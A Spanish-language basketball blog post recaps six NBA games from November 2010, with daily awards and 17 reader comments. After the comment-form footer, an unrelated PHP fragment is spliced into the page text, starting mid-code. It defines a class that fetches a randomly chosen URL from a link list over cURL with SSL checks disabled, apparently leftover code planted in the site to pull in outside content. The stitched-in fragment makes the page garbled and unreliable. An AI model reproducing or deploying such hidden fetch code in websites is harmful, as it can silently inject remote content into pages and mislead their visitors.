La Crónica (08/11/2010)

09 de November de 2010 por TheDeerHunter

Extrema igualdad en la jornada de anoche. Hasta 4 partidos de los 6 disputados se resolvieron por un par de canastas o menos.

Los Mavs impusieron su condición de locales para llevarse una estrecha victoria contra los Celtics, a cara de perro y a menos de 90 puntos (87-89). Tras una floja actuación el domingo contra Denver, Nowitzki volvió a resultar determinante bien arropado por Tyson Chandler y Jason Terry. Gran primera parte de Dallas, pero de la mano de Garnett y Pierce los Celtics volvieron a la pomada tras el descanso. Al final todo se resolvió con un canastón del alemán a 17 segundos y hasta 3 malos ataques resueltos por Boston, con triples desesperadamente lanzados por Rondo y Garnett. Rivers no quedó nada contento.

La visita de los Nuggets a Chicago también concluyó de infarto. Un partido similar en su desarrollo al anterior, con los locales mandando cómodos en la primera parte, los visitantes remontando en el 3er cuarto y el partido resolviéndose en últimos lanzamientos (92-94). Melo se mostró demoledor pero le faltó apoyo anotador. Todo se decidió en detalles, como los 9 tapones que repartieron entre Noah y Gibson. Rose estuvo incisivo, como siempre… la máxima producción de su equipo que oculta el pobre 7 de 21 que se cascó.

Duelazo en Florida entre Magic y Hawks, que se volvieron con la 2ª derrota consecutiva bajo del brazo (89-93). Parece que Van Gundy nos hizo caso con los comentarios de hace unos días. Dwight Howard ha sido nombrado MVP de la semana en el Este y ayer el equipo se centró en él, con muy buenos resultados. Lanzó 20 tiros con porcentajes correctos, y encima metió los tiros libres. Tampoco es que tuviera delante a Mutombo (tenía a Jason Collins). Vince Carter le ayudó como debería hacerlo siempre, en segundo plano. El resto del equipo estuvo regular. Por parte de Atlanta aguantaron fuerte con sus particulares “fantastic four”. Ya sabemos que necesitan más para subir el peldaño ante este tipo de rivales.

Por su parte, los Spurs se vieron con el agua al cuello en Charlotte (95-91). Tiraron de los triples de Ginobili y Gary Neal para salir vivos. Al menos Richard Jefferson estuvo acertado encima de Gerald Wallace. Con su versión del curso pasado el equipo de Popovich se hubiera marchado con la derrota.

Los Grizzlies se vengaron de la derrota en la prórroga de Phoenix hace unos días (99-109). Randolph se puso cieguísimo abusando del juego interior rival. Mira que Robin Lopez había apuntado maneras al final del curso pasado pero vuelve a ser un desastre. No le ayuda tener a un negado Turkoglu al lado. Preferimos 1000 veces antes a un Warrick al 50% que a esta versión del turco. ¡Warrick titular ya!

Por último, los Warriors ganaron a Toronto en un partido negado de Calderón. Monta se lesionó al final pero antes les había reventado junto a Curry. La defensa de los Raptors dio todas las facilidades del mundo. En ataque dieron más o menos la cara, pero como suele pasar, sin defensa hay poco que hacer por mucho que te mates en ataque (109-102).

PREMIOS

MVP: Protagonistas en las respectivas victorias de sus equipos, Zach Randolph (23 puntos y 20 rebotes) y Stephen Curry (34 puntos, 5 rebotes, 4 asistencias, 3 robos) son, sin duda, los mejores jugadores del día.

Rookie: Interesante partido de Xavier Henry de los Grizzlies, anotando 14 puntos desde el banco.

Sorpresa: A sus 38 años, Grant Hill es todavía un jugador clave en su equipo capaz de realizar tan buenas actuaciones como las de anoche, 19 puntos (8 de 10) y 12 rebotes y 3 asistencias. Muchos deberían aprender de él.

Decepción: Horrible partido de José Calderón: 0 puntos, 0 rebotes y 1 asistencia con un 0 de 4 en tiros de campo y sólo 10 minutos de juego. Vistos los problemas defensivos del español, Stephen Curry y Monta Ellis no eran, precisamente, los mejores jugadores a los que enfrentarse.

Esfuerzo en vano: El canto de un duro separó a Carmelo Anthony y los Nuggets de la victoria. Al final no pudo ser y los 32 puntos y 8 rebotes del ex de Syracuse se quedaron en nada.

Comenta

17 comentarios a esta entrada

  1. Denise dice:
    #1

    Sobre los Magic, muy buen partido atrás, pero horrible partido en ataque, sólo Howard y Carter estuvieron acertados, el resto, pfff, Lewis en su línea del año pasado, los nuevos fichajes horribles (nada nuevo), y Redick (que tirria le tengo a este hombre) dejandose llevar desde que ha renovado.
    ¿Cuanto hacia que no veíamos a los Magic anotar solo 4 triples?? Vaya porcentajes…

      Citar

  2. Scriers dice:
    #2

    Por que denise? A mi me gusta, me parece algo mas que un tirador

      Citar

  3. Scriers dice:
    #3

    Por cierto, no puede ser mas diferente el aspecto fisico de nowitzki al de hoy dia, ahora lleva pelo largo y una cinta en el pelo y esta mucho mas guapo :p

      Citar

  4. Denise dice:
    #4

    Para mí, Redick es un jugador bastante irregular, lo veo como el típico tirador de rachas, capaz de meter 5 triples seguidos y después fallar 10. No es que no me guste, tampoco digo que sea un paquete, es un jugador con futuro todavía y con un nivel absolutamente NBA, pero el contrato que ha firmado este verano lo veo excesivo acorde a su calidad y a su rendimiento. Haberle firmado 20 kilos por 3 años, y teniendo ya contratos que pesan como losas como el de Lewis, Gortat (me gusta, pero es inutil firmarle este contrato teniendo a Howard) , me parecen un error muy grave cometido por Otis Smith.
    para mí, el rol ideal de Redick es el de jugador suplente de 12-16 minutos, y el día que esté enrachado que juegue 30, y cobrando no más de 3 kilos al año.
    Ojalá me equivoque con él, pero a día de hoy, yo lo hubiera dejado marchar a Chicago y hubiera renovado a Barnes.

    Aunque Melo me cae mal, espero como agua de mayo, un trade Carter-Melo, ó un Lewis – Melo & Harrington.

    Si esto no sucede, el Lakers-Heat será la final claramente (salvo lesiones).

      Citar

  5. Jona dice:
    #5

    La foto de Dirk es de ayer como todos los a~nos se corta el pelo
    al poco de empezar la temporada , veo que no has visto ni el resumen …
    XD

      Citar

  6. Denise dice:
    #6

    Por cierto Sciers, si ves el próximo partido de Magic, fijate en el pasotismo de Redick.
    Ves normal que un tío lleve en 125 minutos de juego, 5 rebotes y 6 asistencias??. Por no hablar de su 16% en tiros de 3 y en su pésima defensa.
    Ojala Van Gundy y su voz desgañitada le cante las 40.

      Citar

  7. Scriers dice:
    #7

    Pues jona, la que he visto era del as. Es curioso que sea al contrario, es decir, que aqui sea escrupuloso y alli no. Lo mismo eso tiene que ver con que este blog sea la leche y las secciones de basket de determinados periodicos sean una porqueria. No he visto el resumen pq los videos son ya un descaro ponerlos en el curro. Por cierto, de donde sacais las fotos del blog?

      Citar

  8. TheDeerHunter dice:
    #8

    por lo general de yahoo

      Citar

  9. kantonyo dice:
    #9

    Como me gusta Stephen Curry, que talento y que elegancia tiene jugando al basket. Además se nota que cada día está más cómodo y mejora su forma de ver el juego y el tempo que le dá a los partidos. Su dupla con Monta Ellis es espectacular. Es uno de los equipos junto con Hornets que más me ha sorprendido al inicio de la temporada.

    Yo ya le conocia de Davidson, donde había demostrado sus dotes para el lanzamiento, pero jamas pensé que iba a tener esa capacidad de penetración a la canasta contra el juego interior de la NBA…

    También sorprende que esté jugando 4 minutos menos por partido (36.2 a 32.8), y haya mejorado sus estadisticas de asistencias (5.9 a 6.6) y en puntos (17.5 a 21.0). Es un dato aclarador de lo que está mejorando día a día.

      Citar

  10. Lanegan dice:
    #10

    Buenas tardes. A ver si alguno de vosotros que haya estado viendo los partidos de los Celtics me puede hacer un comentario sobre como ve a Garnett este año. Por lo que he visto en resumenes y por sus estadisticas parece que esta más fino que la temporada pasada, ¿es verdad? Rivers ya había dicho que este año estaría en mejor forma física.

    Saludos!

      Citar

  11. Jona dice:
    #11

    Curry es increíble la verdad. 34 pts a pesar de
    que se tuvo que retirar tocado en la primera parte
    de la lesion que le ha impedido jugar 2partidos . La lesión de
    Ellis ayer ,Rarisima estuvo 5min en el suelo sin poder moverse y ni
    siquiera pitaron falta…espero que no sea nada

      Citar

  12. Tobal dice:
    #12

    Una vez más,el gran Nowitzki resuelve un partido igualado,como el de ayer, ! qué bueno es el alemán ! .Por otra parte,los Warriors han empezado muy bien este curso 2010-2011,con Curry y Ellis,destacando mucho,como sigan así darán muchas alegrias,a sus fieles aficionados

      Citar

  13. Mariano dice:
    #13

    Buena Cronica.. aunque yo hubiese puesto como Rookie a Gary Neal 😉

      Citar

  14. aro_pasado_no_newtoniano dice:
    #14

    el mayor esfuerzo en vano,,,¿no fue el de los entrenadores de Charly Villanueva?

      Citar

  15. Txusma dice:
    #15

    Me cuesta pensar en Gary Neal como rookie, pero tienes toda la razón, Mariano.

      Citar

  16. LEmontus dice:
    #16

    aunque un poco tarde buena reclamación Warrick titular y más tiros ya.

      Citar

  17. Txusma dice:
    #17

    Lo q sea en lugar de Turkoglu…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>